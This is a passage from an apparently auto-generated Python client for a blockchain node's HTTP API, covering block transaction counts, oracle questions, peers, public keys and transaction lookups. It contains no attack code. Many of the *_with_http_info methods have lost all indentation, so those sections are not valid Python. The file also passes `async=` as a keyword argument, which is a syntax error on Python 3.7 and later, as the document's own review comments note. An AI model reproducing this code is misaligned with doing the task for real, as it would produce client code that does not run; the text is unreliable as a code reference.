    # control flags every generated method understands.
    all_params = ['tx_encoding']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Generated-code idiom: seed `params` from locals(), then merge each
    # validated keyword argument in.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_block_pending" % key
            )
        params[key] = val
    del params['kwargs']

    # Marshal query parameters for the transport layer; no path params.
    collection_formats = {}

    path_params = {}

    query_params = []
    if 'tx_encoding' in params:
        query_params.append(('tx_encoding', params['tx_encoding']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # NOTE(review): `async` became a reserved keyword in Python 3.7; the
    # `async=` keyword argument below only parses on older interpreters.
    return self.api_client.call_api(
        '/block/pending', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='GenericBlock',  # noqa: E501
        auth_settings=auth_settings,
        async=params.get('async'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_block_txs_count_by_hash(self, hash, **kwargs):  # noqa: E501
    """get_block_txs_count_by_hash  # noqa: E501

    Get a block transactions count by hash.  Synchronous by default; pass
    async=True to run the request in the background and receive the
    request thread instead:

    >>> thread = api.get_block_txs_count_by_hash(hash, async=True)
    >>> result = thread.get()

    :param async bool
    :param str hash: Hash of the block to fetch (required)
    :param str tx_types: Transactions types to show. Comma separated
    :param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
    :return: InlineResponse200, or the request thread when called asynchronously
    """
    # Delegate to the low-level variant, requesting the deserialized body
    # only; the async/sync distinction is handled entirely by that helper.
    kwargs['_return_http_data_only'] = True
    return self.get_block_txs_count_by_hash_with_http_info(hash, **kwargs)  # noqa: E501
def get_block_txs_count_by_hash_with_http_info(self, hash, **kwargs):  # noqa: E501
    """get_block_txs_count_by_hash  # noqa: E501

    Get a block transactions count by hash  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_block_txs_count_by_hash_with_http_info(hash, async=True)
    >>> result = thread.get()

    :param async bool
    :param str hash: Hash of the block to fetch (required)
    :param str tx_types: Transactions types to show. Comma separated
    :param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
    :return: InlineResponse200
             If the method is called asynchronously,
             returns the request thread.
    """
    # Whitelist of accepted kwargs: the endpoint's own parameters plus the
    # control flags every generated method understands.
    all_params = ['hash', 'tx_types', 'exclude_tx_types']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Generated-code idiom: seed `params` from locals() (self, hash,
    # kwargs), then merge each validated keyword argument in.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_block_txs_count_by_hash" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'hash' is set
    if ('hash' not in params or
            params['hash'] is None):
        raise ValueError("Missing the required parameter `hash` when calling `get_block_txs_count_by_hash`")  # noqa: E501

    # Marshal path and query parameters for the transport layer.
    collection_formats = {}

    path_params = {}
    if 'hash' in params:
        path_params['hash'] = params['hash']  # noqa: E501

    query_params = []
    if 'tx_types' in params:
        query_params.append(('tx_types', params['tx_types']))  # noqa: E501
    if 'exclude_tx_types' in params:
        query_params.append(('exclude_tx_types', params['exclude_tx_types']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # NOTE(review): `async` became a reserved keyword in Python 3.7; the
    # `async=` keyword argument below only parses on older interpreters.
    return self.api_client.call_api(
        '/block/txs/count/hash/{hash}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='InlineResponse200',  # noqa: E501
        auth_settings=auth_settings,
        async=params.get('async'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_block_txs_count_by_height(self, height, **kwargs):  # noqa: E501
    """get_block_txs_count_by_height  # noqa: E501

    Get a block transactions count by height.  Synchronous by default;
    pass async=True to run the request in the background and receive the
    request thread instead:

    >>> thread = api.get_block_txs_count_by_height(height, async=True)
    >>> result = thread.get()

    :param async bool
    :param int height: Height of the block to fetch (required)
    :param str tx_types: Transactions types to show. Comma separated
    :param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
    :return: InlineResponse200, or the request thread when called asynchronously
    """
    # Delegate to the low-level variant, requesting the deserialized body
    # only; the async/sync distinction is handled entirely by that helper.
    kwargs['_return_http_data_only'] = True
    return self.get_block_txs_count_by_height_with_http_info(height, **kwargs)  # noqa: E501
def get_block_txs_count_by_height_with_http_info(self, height, **kwargs):  # noqa: E501
    """get_block_txs_count_by_height  # noqa: E501

    Get a block transactions count by height  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_block_txs_count_by_height_with_http_info(height, async=True)
    >>> result = thread.get()

    :param async bool
    :param int height: Height of the block to fetch (required)
    :param str tx_types: Transactions types to show. Comma separated
    :param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
    :return: InlineResponse200
             If the method is called asynchronously,
             returns the request thread.
    """
    # Whitelist of accepted kwargs: the endpoint's own parameters plus the
    # control flags every generated method understands.
    all_params = ['height', 'tx_types', 'exclude_tx_types']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Generated-code idiom: seed `params` from locals() (self, height,
    # kwargs), then merge each validated keyword argument in.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_block_txs_count_by_height" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'height' is set
    if ('height' not in params or
            params['height'] is None):
        raise ValueError("Missing the required parameter `height` when calling `get_block_txs_count_by_height`")  # noqa: E501

    # Marshal path and query parameters for the transport layer.
    collection_formats = {}

    path_params = {}
    if 'height' in params:
        path_params['height'] = params['height']  # noqa: E501

    query_params = []
    if 'tx_types' in params:
        query_params.append(('tx_types', params['tx_types']))  # noqa: E501
    if 'exclude_tx_types' in params:
        query_params.append(('exclude_tx_types', params['exclude_tx_types']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # NOTE(review): `async` became a reserved keyword in Python 3.7; the
    # `async=` keyword argument below only parses on older interpreters.
    return self.api_client.call_api(
        '/block/txs/count/height/{height}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='InlineResponse200',  # noqa: E501
        auth_settings=auth_settings,
        async=params.get('async'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_genesis_block_txs_count(self, **kwargs):  # noqa: E501
    """get_genesis_block_txs_count  # noqa: E501

    Get the genesis block transactions count.  Synchronous by default;
    pass async=True to run the request in the background and receive the
    request thread instead:

    >>> thread = api.get_genesis_block_txs_count(async=True)
    >>> result = thread.get()

    :param async bool
    :param str tx_types: Transactions types to show. Comma separated
    :param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
    :return: InlineResponse200, or the request thread when called asynchronously
    """
    # Delegate to the low-level variant, requesting the deserialized body
    # only; the async/sync distinction is handled entirely by that helper.
    kwargs['_return_http_data_only'] = True
    return self.get_genesis_block_txs_count_with_http_info(**kwargs)  # noqa: E501
def get_genesis_block_txs_count_with_http_info(self, **kwargs): # noqa: E501
"""get_genesis_block_txs_count # noqa: E501
Get the genesis block transactions count # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_genesis_block_txs_count_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tx_types', 'exclude_tx_types'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_genesis_block_txs_count" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'tx_types' in params:
query_params.append(('tx_types', params['tx_types'])) # noqa: E501
if 'exclude_tx_types' in params:
query_params.append(('exclude_tx_types', params['exclude_tx_types'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/txs/count/genesis', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_latest_block_txs_count(self, **kwargs):  # noqa: E501
    """Get the latest block transactions count.

    Synchronous by default; pass ``async=True`` to receive the request
    thread instead (call ``thread.get()`` on it for the result).

    :param async bool: execute the request asynchronously
    :param str tx_types: Transactions types to show. Comma separated
    :param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
    :return: InlineResponse200
             If the method is called asynchronously, returns the
             request thread.
    """
    # This convenience wrapper always unwraps the (data, status,
    # headers) triple down to just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async'):
        # Async path: hand the request thread back untouched.
        return self.get_latest_block_txs_count_with_http_info(**kwargs)  # noqa: E501
    response = self.get_latest_block_txs_count_with_http_info(**kwargs)  # noqa: E501
    return response
def get_latest_block_txs_count_with_http_info(self, **kwargs): # noqa: E501
"""get_latest_block_txs_count # noqa: E501
Get the latest block transactions count # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_latest_block_txs_count_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tx_types', 'exclude_tx_types'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_latest_block_txs_count" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'tx_types' in params:
query_params.append(('tx_types', params['tx_types'])) # noqa: E501
if 'exclude_tx_types' in params:
query_params.append(('exclude_tx_types', params['exclude_tx_types'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/txs/count/latest', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_oracle_questions(self, oracle_pub_key, **kwargs):  # noqa: E501
    """Get active oracle questions.

    Synchronous by default; pass ``async=True`` to receive the request
    thread instead (call ``thread.get()`` on it for the result).

    :param async bool: execute the request asynchronously
    :param str oracle_pub_key: Oracle public key (required)
    :param str _from: Last query id in previous page
    :param int max: Max number of oracle queries received
    :return: OracleQuestions
             If the method is called asynchronously, returns the
             request thread.
    """
    # This convenience wrapper always unwraps the (data, status,
    # headers) triple down to just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async'):
        # Async path: hand the request thread back untouched.
        return self.get_oracle_questions_with_http_info(oracle_pub_key, **kwargs)  # noqa: E501
    response = self.get_oracle_questions_with_http_info(oracle_pub_key, **kwargs)  # noqa: E501
    return response
def get_oracle_questions_with_http_info(self, oracle_pub_key, **kwargs): # noqa: E501
"""get_oracle_questions # noqa: E501
Get active oracle questions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_oracle_questions_with_http_info(oracle_pub_key, async=True)
>>> result = thread.get()
:param async bool
:param str oracle_pub_key: Oracle public key (required)
:param str _from: Last query id in previous page
:param int max: Max number of oracle queries received
:return: OracleQuestions
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['oracle_pub_key', '_from', 'max'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_oracle_questions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'oracle_pub_key' is set
if ('oracle_pub_key' not in params or
params['oracle_pub_key'] is None):
raise ValueError("Missing the required parameter `oracle_pub_key` when calling `get_oracle_questions`") # noqa: E501
if 'max' in params and params['max'] > 1000: # noqa: E501
raise ValueError("Invalid value for parameter `max` when calling `get_oracle_questions`, must be a value less than or equal to `1000`") # noqa: E501
if 'max' in params and params['max'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `max` when calling `get_oracle_questions`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'oracle_pub_key' in params:
query_params.append(('oracle_pub_key', params['oracle_pub_key'])) # noqa: E501
if '_from' in params:
query_params.append(('from', params['_from'])) # noqa: E501
if 'max' in params:
query_params.append(('max', params['max'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/oracle-questions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OracleQuestions', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_peers(self, **kwargs):  # noqa: E501
    """Get node Peers.

    Synchronous by default; pass ``async=True`` to receive the request
    thread instead (call ``thread.get()`` on it for the result).

    :param async bool: execute the request asynchronously
    :return: Peers
             If the method is called asynchronously, returns the
             request thread.
    """
    # This convenience wrapper always unwraps the (data, status,
    # headers) triple down to just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async'):
        # Async path: hand the request thread back untouched.
        return self.get_peers_with_http_info(**kwargs)  # noqa: E501
    response = self.get_peers_with_http_info(**kwargs)  # noqa: E501
    return response
def get_peers_with_http_info(self, **kwargs): # noqa: E501
"""get_peers # noqa: E501
Get node Peers # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_peers_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: Peers
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_peers" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/debug/peers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Peers', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_pending_block_txs_count(self, **kwargs):  # noqa: E501
    """Get the pending block transactions count.

    Synchronous by default; pass ``async=True`` to receive the request
    thread instead (call ``thread.get()`` on it for the result).

    :param async bool: execute the request asynchronously
    :param str tx_types: Transactions types to show. Comma separated
    :param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
    :return: InlineResponse200
             If the method is called asynchronously, returns the
             request thread.
    """
    # This convenience wrapper always unwraps the (data, status,
    # headers) triple down to just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async'):
        # Async path: hand the request thread back untouched.
        return self.get_pending_block_txs_count_with_http_info(**kwargs)  # noqa: E501
    response = self.get_pending_block_txs_count_with_http_info(**kwargs)  # noqa: E501
    return response
def get_pending_block_txs_count_with_http_info(self, **kwargs): # noqa: E501
"""get_pending_block_txs_count # noqa: E501
Get the pending block transactions count # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_pending_block_txs_count_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tx_types', 'exclude_tx_types'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_pending_block_txs_count" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'tx_types' in params:
query_params.append(('tx_types', params['tx_types'])) # noqa: E501
if 'exclude_tx_types' in params:
query_params.append(('exclude_tx_types', params['exclude_tx_types'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/txs/count/pending', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_pub_key(self, **kwargs):  # noqa: E501
    """Get user's public key address.

    Synchronous by default; pass ``async=True`` to receive the request
    thread instead (call ``thread.get()`` on it for the result).

    :param async bool: execute the request asynchronously
    :return: PubKey
             If the method is called asynchronously, returns the
             request thread.
    """
    # This convenience wrapper always unwraps the (data, status,
    # headers) triple down to just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async'):
        # Async path: hand the request thread back untouched.
        return self.get_pub_key_with_http_info(**kwargs)  # noqa: E501
    response = self.get_pub_key_with_http_info(**kwargs)  # noqa: E501
    return response
def get_pub_key_with_http_info(self, **kwargs): # noqa: E501
"""get_pub_key # noqa: E501
Get user's public key address # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_pub_key_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: PubKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_pub_key" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/account/pub-key', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PubKey', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_transaction_from_block_hash(self, hash, tx_index, **kwargs):  # noqa: E501
    """Get a transaction by index in the block by hash.

    Synchronous by default; pass ``async=True`` to receive the request
    thread instead (call ``thread.get()`` on it for the result).

    :param async bool: execute the request asynchronously
    :param str hash: Hash of the block to search for (required)
    :param int tx_index: Index of the transaction in the block (required)
    :param str tx_encoding: Transactions encoding
    :return: SingleTxObject
             If the method is called asynchronously, returns the
             request thread.
    """
    # This convenience wrapper always unwraps the (data, status,
    # headers) triple down to just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async'):
        # Async path: hand the request thread back untouched.
        return self.get_transaction_from_block_hash_with_http_info(hash, tx_index, **kwargs)  # noqa: E501
    response = self.get_transaction_from_block_hash_with_http_info(hash, tx_index, **kwargs)  # noqa: E501
    return response
def get_transaction_from_block_hash_with_http_info(self, hash, tx_index, **kwargs): # noqa: E501
"""get_transaction_from_block_hash # noqa: E501
Get a transaction by index in the block by hash # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_transaction_from_block_hash_with_http_info(hash, tx_index, async=True)
>>> result = thread.get()
:param async bool
:param str hash: Hash of the block to search for (required)
:param int tx_index: Index of the transaction in the block (required)
:param str tx_encoding: Transactions encoding
:return: SingleTxObject
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['hash', 'tx_index', 'tx_encoding'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_transaction_from_block_hash" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'hash' is set
if ('hash' not in params or
params['hash'] is None):
raise ValueError("Missing the required parameter `hash` when calling `get_transaction_from_block_hash`") # noqa: E501
# verify the required parameter 'tx_index' is set
if ('tx_index' not in params or
params['tx_index'] is None):
raise ValueError("Missing the required parameter `tx_index` when calling `get_transaction_from_block_hash`") # noqa: E501
collection_formats = {}
path_params = {}
if 'hash' in params:
path_params['hash'] = params['hash'] # noqa: E501
if 'tx_index' in params:
path_params['tx_index'] = params['tx_index'] # noqa: E501
query_params = []
if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/tx/hash/{hash}/{tx_index}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SingleTxObject', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_transaction_from_block_height(self, height, tx_index, **kwargs):  # noqa: E501
    """Get a transaction by index in the block by height.

    Synchronous by default; pass ``async=True`` to receive the request
    thread instead (call ``thread.get()`` on it for the result).

    :param async bool: execute the request asynchronously
    :param int height: Height of the block to search for (required)
    :param int tx_index: Index of the transaction in the block (required)
    :param str tx_encoding: Transactions encoding
    :return: SingleTxObject
             If the method is called asynchronously, returns the
             request thread.
    """
    # This convenience wrapper always unwraps the (data, status,
    # headers) triple down to just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async'):
        # Async path: hand the request thread back untouched.
        return self.get_transaction_from_block_height_with_http_info(height, tx_index, **kwargs)  # noqa: E501
    response = self.get_transaction_from_block_height_with_http_info(height, tx_index, **kwargs)  # noqa: E501
    return response
def get_transaction_from_block_height_with_http_info(self, height, tx_index, **kwargs): # noqa: E501
"""get_transaction_from_block_height # noqa: E501
Get a transaction by index in the block by height # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_transaction_from_block_height_with_http_info(height, tx_index, async=True)
>>> result = thread.get()
:param async bool
:param int height: Height of the block to search for (required)
:param int tx_index: Index of the transaction in the block (required)
:param str tx_encoding: Transactions encoding
:return: SingleTxObject
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['height', 'tx_index', 'tx_encoding'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_transaction_from_block_height" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'height' is set
if ('height' not in params or
params['height'] is None):
raise ValueError("Missing the required parameter `height` when calling `get_transaction_from_block_height`") # noqa: E501
# verify the required parameter 'tx_index' is set
if ('tx_index' not in params or
params['tx_index'] is None):
raise ValueError("Missing the required parameter `tx_index` when calling `get_transaction_from_block_height`") # noqa: E501
collection_formats = {}
path_params = {}
if 'height' in params:
path_params['height'] = params['height'] # noqa: E501
if 'tx_index' in params:
path_params['tx_index'] = params['tx_index'] # noqa: E501
query_params = []
if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/tx/height/{height}/{tx_index}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SingleTxObject', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_transaction_from_block_latest(self, tx_index, **kwargs):  # noqa: E501
    """Get a transaction by index in the latest block.

    Synchronous by default; pass ``async=True`` to receive the request
    thread instead (call ``thread.get()`` on it for the result).

    :param async bool: execute the request asynchronously
    :param int tx_index: Index of the transaction in the block (required)
    :param str tx_encoding: Transactions encoding
    :return: SingleTxObject
             If the method is called asynchronously, returns the
             request thread.
    """
    # This convenience wrapper always unwraps the (data, status,
    # headers) triple down to just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async'):
        # Async path: hand the request thread back untouched.
        return self.get_transaction_from_block_latest_with_http_info(tx_index, **kwargs)  # noqa: E501
    response = self.get_transaction_from_block_latest_with_http_info(tx_index, **kwargs)  # noqa: E501
    return response
def get_transaction_from_block_latest_with_http_info(self, tx_index, **kwargs): # noqa: E501
"""get_transaction_from_block_latest # noqa: E501
Get a transaction by index in the latest block # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_transaction_from_block_latest_with_http_info(tx_index, async=True)
>>> result = thread.get()
:param async bool
:param int tx_index: Index of the transaction in the block (required)
:param str tx_encoding: Transactions encoding
:return: SingleTxObject
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tx_index', 'tx_encoding'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_transaction_from_block_latest" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'tx_index' is set
if ('tx_index' not in params or
params['tx_index'] is None):
raise ValueError("Missing the required parameter `tx_index` when calling `get_transaction_from_block_latest`") # noqa: E501
collection_formats = {}
path_params = {}
if 'tx_index' in params:
path_params['tx_index'] = params['tx_index'] # noqa: E501
query_params = []
